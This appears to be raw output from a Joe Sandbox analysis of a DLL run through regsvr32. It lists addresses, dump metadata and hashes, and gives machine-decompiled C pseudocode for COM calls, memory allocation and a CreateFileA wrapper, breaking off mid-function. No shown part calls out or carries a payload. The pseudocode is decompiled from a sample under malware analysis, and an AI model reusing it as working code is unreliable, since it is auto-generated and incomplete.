                                                                                                            0x1002c3c1
                                                                                                            0x1002c3c3
                                                                                                            0x1002c3c5
                                                                                                            0x1002c3ca
                                                                                                            0x1002c3cd
                                                                                                            0x1002c3d3
                                                                                                            0x1002c3d8
                                                                                                            0x1002c3dc
                                                                                                            0x1002c3dd
                                                                                                            0x1002c3cd
                                                                                                            0x1002c3e1
                                                                                                            0x1002c3e6
                                                                                                            0x1002c3eb
                                                                                                            0x1002c3ee
                                                                                                            0x1002c3f1
                                                                                                            0x1002c3f6
                                                                                                            0x1002c3fd
                                                                                                            0x1002c400
                                                                                                            0x1002c409
                                                                                                            0x1002c417
                                                                                                            0x1002c425
                                                                                                            0x1002c42c
                                                                                                            0x1002c44b
                                                                                                            0x1002c44b
                                                                                                            0x1002c450
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c458
                                                                                                            0x1002c45b
                                                                                                            0x1002c460
                                                                                                            0x1002c464
                                                                                                            0x1002c467
                                                                                                            0x1002c467
                                                                                                            0x1002c46d
                                                                                                            0x1002c46e
                                                                                                            0x1002c473
                                                                                                            0x1002c211
                                                                                                            0x1002c1ed
                                                                                                            0x1002c478
                                                                                                            0x1002c48d
                                                                                                            0x1002c49a
                                                                                                            0x1002c4a5
                                                                                                            0x1002c4b3
                                                                                                            0x1002c4b8
                                                                                                            0x1002c4c1
                                                                                                            0x1002c4c3
                                                                                                            0x1002c4c3
                                                                                                            0x1002c4c6
                                                                                                            0x1002c4cc
                                                                                                            0x1002c4ce
                                                                                                            0x1002c4ce
                                                                                                            0x1002c4d1
                                                                                                            0x1002c4d7
                                                                                                            0x1002c4dc
                                                                                                            0x1002c4e0

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Empty$Window
                                                                                                            • String ID: @
                                                                                                            • API String ID: 444217639-2766056989
                                                                                                            • Opcode ID: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                                                            • Instruction ID: 58262607db454327f65a07b4950f04bdf16dc99993eabd06514925c449a16dc0
                                                                                                            • Opcode Fuzzy Hash: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                                                            • Instruction Fuzzy Hash: 11C13972D00209DFCB05CFA8D994EAEB7F5FF48350F518569E815AB251DB34AE05CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E1000E14F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _t130;
                                                                                                            				intOrPtr* _t133;
                                                                                                            				intOrPtr* _t140;
                                                                                                            				intOrPtr* _t143;
                                                                                                            				intOrPtr _t144;
                                                                                                            				signed int _t146;
                                                                                                            				intOrPtr* _t147;
                                                                                                            				void* _t149;
                                                                                                            				intOrPtr* _t153;
                                                                                                            				signed int _t158;
                                                                                                            				intOrPtr _t159;
                                                                                                            				intOrPtr* _t161;
                                                                                                            				intOrPtr* _t163;
                                                                                                            				intOrPtr* _t165;
                                                                                                            				intOrPtr* _t166;
                                                                                                            				intOrPtr _t169;
                                                                                                            				intOrPtr* _t170;
                                                                                                            				intOrPtr* _t172;
                                                                                                            				intOrPtr _t174;
                                                                                                            				signed int _t178;
                                                                                                            				signed int _t180;
                                                                                                            				signed int _t186;
                                                                                                            				signed int _t188;
                                                                                                            				intOrPtr* _t190;
                                                                                                            				intOrPtr* _t192;
                                                                                                            				intOrPtr _t196;
                                                                                                            				intOrPtr _t198;
                                                                                                            				intOrPtr* _t199;
                                                                                                            				void* _t200;
                                                                                                            				intOrPtr _t213;
                                                                                                            				intOrPtr* _t215;
                                                                                                            				intOrPtr* _t261;
                                                                                                            				void* _t263;
                                                                                                            
                                                                                                            				E10011BF0(0x1003af36, _t263);
                                                                                                            				_t130 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t261 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
                                                                                                            				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                            				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                                                                            					_t133 =  *((intOrPtr*)(__ecx + 8));
                                                                                                            					if(_t133 != 0) {
                                                                                                            						_push(_t263 - 0x7c);
                                                                                                            						_push(_t263 - 0x78);
                                                                                                            						_push(0x10043008);
                                                                                                            						_push(_t133);
                                                                                                            						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
                                                                                                            							E1000B1A4(_t263 - 0x70, 0x10043744);
                                                                                                            							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x58)) = 0;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x54)) = 0;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x48)) = 0;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
                                                                                                            							E1000B1A4(_t263 - 0x40, 0x1004372c);
                                                                                                            							_t140 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x24)) = 0;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x18)) = 0;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
                                                                                                            							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
                                                                                                            							if(_t196 >= 0) {
                                                                                                            								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
                                                                                                            								_t143 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
                                                                                                            								 *(_t263 - 0x98) = 0;
                                                                                                            								 *((intOrPtr*)(_t263 - 0x94)) = 0;
                                                                                                            								 *((intOrPtr*)(_t263 - 0x90)) = 0;
                                                                                                            								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
                                                                                                            								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
                                                                                                            								if(_t144 >= 0) {
                                                                                                            									 *(_t261 + 0x14) =  *(_t263 - 0x98);
                                                                                                            									_t146 =  *(_t263 - 0x8c);
                                                                                                            									 *(_t263 - 0x7c) = _t146;
                                                                                                            									 *(_t261 + 0x10) = _t146;
                                                                                                            									_t147 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
                                                                                                            									 *((intOrPtr*)( *_t147 + 8))(_t147);
                                                                                                            									goto L23;
                                                                                                            								} else {
                                                                                                            									_t161 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            									 *((intOrPtr*)( *_t161 + 8))(_t161);
                                                                                                            								}
                                                                                                            								goto L41;
                                                                                                            							} else {
                                                                                                            								_t163 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            								 *((intOrPtr*)( *_t163 + 8))(_t163);
                                                                                                            								_t134 = _t196;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t134 = 0;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
                                                                                                            					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x10043228, _t263 - 0x74);
                                                                                                            					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
                                                                                                            					if(_t134 >= 0) {
                                                                                                            						_t166 =  *((intOrPtr*)(_t263 - 0x74));
                                                                                                            						_push(_t263 - 0x7c);
                                                                                                            						_push(0x10043208);
                                                                                                            						_push(_t166);
                                                                                                            						if( *((intOrPtr*)( *_t166))() >= 0) {
                                                                                                            							_t186 =  *(_t263 - 0x7c);
                                                                                                            							_push(_t263 - 0x78);
                                                                                                            							_push(0x10043348);
                                                                                                            							 *((intOrPtr*)(_t263 - 0x78)) = 0;
                                                                                                            							_push(_t186);
                                                                                                            							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
                                                                                                            								_t190 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
                                                                                                            								_t192 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            								 *((intOrPtr*)( *_t192 + 8))(_t192);
                                                                                                            							}
                                                                                                            							_t188 =  *(_t263 - 0x7c);
                                                                                                            							 *((intOrPtr*)( *_t188 + 8))(_t188);
                                                                                                            						}
                                                                                                            						if(E1001F77E(0x14) == 0) {
                                                                                                            							_t169 = 0;
                                                                                                            						} else {
                                                                                                            							_t169 = E1000D069(_t168,  *((intOrPtr*)(_t263 - 0x74)));
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
                                                                                                            						_t170 =  *((intOrPtr*)(_t263 - 0x74));
                                                                                                            						 *((intOrPtr*)( *_t170 + 8))(_t170);
                                                                                                            						_t172 =  *((intOrPtr*)(_t261 + 0x50));
                                                                                                            						_t229 =  *_t172;
                                                                                                            						if( *_t172 != 0) {
                                                                                                            							E1000B427(_t229, _t172 + 4);
                                                                                                            						}
                                                                                                            						if(E1001F77E(0x28) == 0) {
                                                                                                            							_t174 = 0;
                                                                                                            						} else {
                                                                                                            							_t174 = E10009E9C(_t173, 0, 0x1f40);
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
                                                                                                            						E1000DB7F(_t174);
                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
                                                                                                            						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
                                                                                                            						 *(_t261 + 0x10) = _t178;
                                                                                                            						_t180 = _t178 + _t178 * 4 << 3;
                                                                                                            						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
                                                                                                            						 *(_t261 + 0x14) = _t180;
                                                                                                            						E10011C50(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
                                                                                                            						E1000DA69( *((intOrPtr*)(_t261 + 0x50)));
                                                                                                            						E1000B3E4( *((intOrPtr*)(_t261 + 0x50)));
                                                                                                            						L23:
                                                                                                            						 *((intOrPtr*)(_t263 - 0x74)) = 0;
                                                                                                            						if( *(_t261 + 0x10) > 0) {
                                                                                                            							_t200 = 0;
                                                                                                            							do {
                                                                                                            								_t158 = E1001F77E(0x1c);
                                                                                                            								 *(_t263 - 0x7c) = _t158;
                                                                                                            								 *(_t263 - 4) = 0;
                                                                                                            								if(_t158 == 0) {
                                                                                                            									_t159 = 0;
                                                                                                            								} else {
                                                                                                            									_t159 = E1001E0EA(_t158, 0xa);
                                                                                                            								}
                                                                                                            								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
                                                                                                            								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
                                                                                                            								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
                                                                                                            								_t200 = _t200 + 0x28;
                                                                                                            							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
                                                                                                            						}
                                                                                                            						_t198 =  *((intOrPtr*)(_t263 - 0x88));
                                                                                                            						if(_t198 != 0) {
                                                                                                            							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
                                                                                                            								_t149 = 0xffffffdc;
                                                                                                            								_t199 = _t198 + 0x24;
                                                                                                            								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
                                                                                                            								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
                                                                                                            								while(1) {
                                                                                                            									_t213 =  *((intOrPtr*)( *_t199 + 4));
                                                                                                            									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
                                                                                                            									if(_t213 == 0) {
                                                                                                            										goto L37;
                                                                                                            									}
                                                                                                            									while(1) {
                                                                                                            										_t153 = E10006D96(_t263 - 0x80);
                                                                                                            										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
                                                                                                            										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
                                                                                                            											goto L37;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									L37:
                                                                                                            									E1001E047( *_t199);
                                                                                                            									_t215 =  *_t199;
                                                                                                            									if(_t215 != 0) {
                                                                                                            										 *((intOrPtr*)( *_t215 + 4))(1);
                                                                                                            									}
                                                                                                            									_t199 = _t199 + 0x28;
                                                                                                            									_t122 = _t263 - 0x74;
                                                                                                            									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
                                                                                                            									if( *_t122 != 0) {
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									goto L40;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L40:
                                                                                                            							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
                                                                                                            						}
                                                                                                            						L41:
                                                                                                            						_t134 =  *((intOrPtr*)(_t263 - 0x84));
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
                                                                                                            				return E100117AE(_t134,  *((intOrPtr*)(_t263 - 0x10)));
                                                                                                            			}




































                                                                                                            0x1000e231
                                                                                                            0x1000e231
                                                                                                            0x1000e240
                                                                                                            0x1000e251
                                                                                                            0x1000e242
                                                                                                            0x1000e24a
                                                                                                            0x1000e24a
                                                                                                            0x1000e256
                                                                                                            0x1000e25d
                                                                                                            0x1000e268
                                                                                                            0x1000e26e
                                                                                                            0x1000e271
                                                                                                            0x1000e277
                                                                                                            0x1000e27b
                                                                                                            0x1000e28d
                                                                                                            0x1000e290
                                                                                                            0x1000e29b
                                                                                                            0x1000e2a3
                                                                                                            0x1000e3d2
                                                                                                            0x1000e3d5
                                                                                                            0x1000e3d8
                                                                                                            0x1000e3da
                                                                                                            0x1000e3dc
                                                                                                            0x1000e3de
                                                                                                            0x1000e3e4
                                                                                                            0x1000e3e9
                                                                                                            0x1000e3ec
                                                                                                            0x1000e3f9
                                                                                                            0x1000e3ee
                                                                                                            0x1000e3f2
                                                                                                            0x1000e3f2
                                                                                                            0x1000e3fb
                                                                                                            0x1000e402
                                                                                                            0x1000e405
                                                                                                            0x1000e40c
                                                                                                            0x1000e40f
                                                                                                            0x1000e3dc
                                                                                                            0x1000e414
                                                                                                            0x1000e41c
                                                                                                            0x1000e421
                                                                                                            0x1000e428
                                                                                                            0x1000e429
                                                                                                            0x1000e432
                                                                                                            0x1000e435
                                                                                                            0x1000e43d
                                                                                                            0x1000e43f
                                                                                                            0x1000e444
                                                                                                            0x1000e447
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000e44e
                                                                                                            0x1000e45b
                                                                                                            0x1000e469
                                                                                                            0x1000e46f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000e44b
                                                                                                            0x1000e471
                                                                                                            0x1000e473
                                                                                                            0x1000e478
                                                                                                            0x1000e47c
                                                                                                            0x1000e482
                                                                                                            0x1000e482
                                                                                                            0x1000e485
                                                                                                            0x1000e488
                                                                                                            0x1000e488
                                                                                                            0x1000e48b
                                                                                                            0x00000000
                                                                                                            0x1000e43a
                                                                                                            0x00000000
                                                                                                            0x1000e48b
                                                                                                            0x1000e43d
                                                                                                            0x1000e48d
                                                                                                            0x1000e493
                                                                                                            0x1000e493
                                                                                                            0x1000e499
                                                                                                            0x1000e499
                                                                                                            0x1000e499
                                                                                                            0x1000e1a0
                                                                                                            0x1000e4a4
                                                                                                            0x1000e4b5

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000E154
                                                                                                            • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E27B
                                                                                                            • CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E493
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Task$AllocFreeH_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 1522537378-3916222277
                                                                                                            • Opcode ID: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                                                            • Instruction ID: e4bcf968e0ea1d6695bf60cb4aa7b1ca6ea302c548195cc232f4004078e55fdd
                                                                                                            • Opcode Fuzzy Hash: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                                                            • Instruction Fuzzy Hash: AAC11874A006489FDB24CFA8C884AAEBBF5FF88344F20465DE155EB256DB71AD45CF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1000B6F5(void* __ecx) {
                                                                                                            				intOrPtr* _t76;
                                                                                                            				intOrPtr* _t101;
                                                                                                            				intOrPtr* _t103;
                                                                                                            				intOrPtr* _t105;
                                                                                                            				intOrPtr* _t107;
                                                                                                            				intOrPtr* _t143;
                                                                                                            				void* _t146;
                                                                                                            				void* _t148;
                                                                                                            
                                                                                                            				E10011BF0(0x1003ae9f, _t148);
                                                                                                            				_t146 = __ecx;
                                                                                                            				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
                                                                                                            				_push(_t148 - 0x14);
                                                                                                            				_push(0x10043128);
                                                                                                            				 *((intOrPtr*)(_t148 - 0x14)) = 0;
                                                                                                            				_push(_t76);
                                                                                                            				 *((intOrPtr*)(_t148 - 0x18)) = 0;
                                                                                                            				if( *((intOrPtr*)( *_t76))() >= 0) {
                                                                                                            					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x78)) = 0;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x50)) = 0;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
                                                                                                            					E10010592(_t148 - 0x28);
                                                                                                            					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
                                                                                                            					 *((intOrPtr*)(_t148 - 4)) = 0;
                                                                                                            					 *(_t148 - 0x6c) = 0;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x10)) = 0;
                                                                                                            					do {
                                                                                                            						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x10040560)), _t148 - 0x28);
                                                                                                            						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
                                                                                                            							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x10040564);
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
                                                                                                            					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
                                                                                                            					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
                                                                                                            					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
                                                                                                            					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
                                                                                                            					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
                                                                                                            					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
                                                                                                            					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
                                                                                                            					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
                                                                                                            					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
                                                                                                            					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
                                                                                                            					_t101 =  *((intOrPtr*)(_t148 - 0x20));
                                                                                                            					_push(_t148 - 0x60);
                                                                                                            					_push(0x10043178);
                                                                                                            					_push(_t101);
                                                                                                            					if( *((intOrPtr*)( *_t101))() < 0) {
                                                                                                            						 *((intOrPtr*)(_t148 - 0x60)) = 0;
                                                                                                            					}
                                                                                                            					_t103 =  *((intOrPtr*)(_t148 - 0x14));
                                                                                                            					_push(_t148 - 0x40);
                                                                                                            					_push(_t148 - 0x80);
                                                                                                            					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
                                                                                                            					_push(_t103);
                                                                                                            					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
                                                                                                            						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
                                                                                                            						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
                                                                                                            						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
                                                                                                            						 *((intOrPtr*)(_t148 - 0x18)) = 1;
                                                                                                            					}
                                                                                                            					_t105 =  *((intOrPtr*)(_t148 - 0x14));
                                                                                                            					 *((intOrPtr*)( *_t105 + 8))(_t105);
                                                                                                            					_t107 =  *((intOrPtr*)(_t148 - 0x60));
                                                                                                            					if(_t107 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t107 + 8))(_t107);
                                                                                                            					}
                                                                                                            					__imp__#9(_t148 - 0x28);
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
                                                                                                            				return  *((intOrPtr*)(_t148 - 0x18));
                                                                                                            			}











                                                                                                            0x1000b876
                                                                                                            0x1000b87b
                                                                                                            0x1000b880
                                                                                                            0x1000b880
                                                                                                            0x1000b887
                                                                                                            0x1000b887
                                                                                                            0x1000b895
                                                                                                            0x1000b89d

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClearH_prologVariant
                                                                                                            • String ID: @$@
                                                                                                            • API String ID: 1166855276-149943524
                                                                                                            • Opcode ID: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                                                            • Instruction ID: d7a2f0cc547cc5a266f2ab8e80424e9948fc94c4121f0c35bce9c1610e35d146
                                                                                                            • Opcode Fuzzy Hash: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                                                            • Instruction Fuzzy Hash: D551D4B1A002199FDB04CFA9C8889EEBBF9FF48314F14456EE506EB250E774A941CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 98%
                                                                                                            			E10025A6D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, CHAR* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v268;
                                                                                                            				struct _SECURITY_ATTRIBUTES _v280;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t40;
                                                                                                            				signed int _t43;
                                                                                                            				signed int _t51;
                                                                                                            				signed int _t53;
                                                                                                            				long _t58;
                                                                                                            				void* _t60;
                                                                                                            				void* _t69;
                                                                                                            				signed int _t73;
                                                                                                            				long _t79;
                                                                                                            				long _t81;
                                                                                                            				void* _t83;
                                                                                                            				signed int _t86;
                                                                                                            				intOrPtr _t87;
                                                                                                            
                                                                                                            				_t40 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t83 = __ecx;
                                                                                                            				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
                                                                                                            				 *(__ecx + 4) =  *(__ecx + 4) | 0xffffffff;
                                                                                                            				_t85 = __ecx + 0xc;
                                                                                                            				_v8 = _t40;
                                                                                                            				_t73 = _a8 & 0xffff7fff;
                                                                                                            				E10006935(_t73, __ecx + 0xc);
                                                                                                            				if(lstrlenA(_a4) >= 0x104 || E1002592C(_t73, _t83, _t85,  &_v268, _a4) == 0) {
                                                                                                            					L30:
                                                                                                            					_t43 = 0;
                                                                                                            					goto L31;
                                                                                                            				} else {
                                                                                                            					E10006AEC(_t85,  &_v268);
                                                                                                            					_t81 = 3;
                                                                                                            					_t51 = _t73 & _t81;
                                                                                                            					_a8 = 0;
                                                                                                            					if(_t51 == 0) {
                                                                                                            						_a8 = 0x80000000;
                                                                                                            					} else {
                                                                                                            						_t69 = _t51 - 1;
                                                                                                            						if(_t69 == 0) {
                                                                                                            							_a8 = 0x40000000;
                                                                                                            						} else {
                                                                                                            							if(_t69 == 1) {
                                                                                                            								_a8 = 0xc0000000;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t53 = _t73 & 0x00000070;
                                                                                                            					_t86 = 1;
                                                                                                            					if(_t53 == 0 || _t53 == 0x10) {
                                                                                                            						L13:
                                                                                                            						_t81 = 0;
                                                                                                            						goto L14;
                                                                                                            					} else {
                                                                                                            						if(_t53 == 0x20) {
                                                                                                            							_t81 = _t86;
                                                                                                            							L14:
                                                                                                            							_v280.nLength = 0xc;
                                                                                                            							_v280.lpSecurityDescriptor = 0;
                                                                                                            							_v280.bInheritHandle =  !(_t73 >> 7) & _t86;
                                                                                                            							if((_t73 & 0x00000010) == 0) {
                                                                                                            								_t58 = 3;
                                                                                                            							} else {
                                                                                                            								asm("sbb eax, eax");
                                                                                                            								_t58 = ( ~(_t73 & 0x00002000) & 0x00000002) + 2;
                                                                                                            							}
                                                                                                            							_t79 = 0x80;
                                                                                                            							if((_t73 & 0x00010000) != 0) {
                                                                                                            								_t79 = 0x20000080;
                                                                                                            							}
                                                                                                            							if((_t73 & 0x00020000) != 0) {
                                                                                                            								_t79 = _t79 | 0x80000000;
                                                                                                            							}
                                                                                                            							if((_t73 & 0x00040000) != 0) {
                                                                                                            								_t79 = _t79 | 0x10000000;
                                                                                                            							}
                                                                                                            							if((_t73 & 0x00080000) != 0) {
                                                                                                            								_t79 = _t79 | 0x08000000;
                                                                                                            							}
                                                                                                            							_t60 = CreateFileA(_a4, _a8, _t81,  &_v280, _t58, _t79, 0);
                                                                                                            							if(_t60 != 0xffffffff) {
                                                                                                            								 *(_t83 + 4) = _t60;
                                                                                                            								 *(_t83 + 8) = _t86;
                                                                                                            								_t43 = _t86;
                                                                                                            								L31:
                                                                                                            								return E100117AE(_t43, _v8);
                                                                                                            							} else {
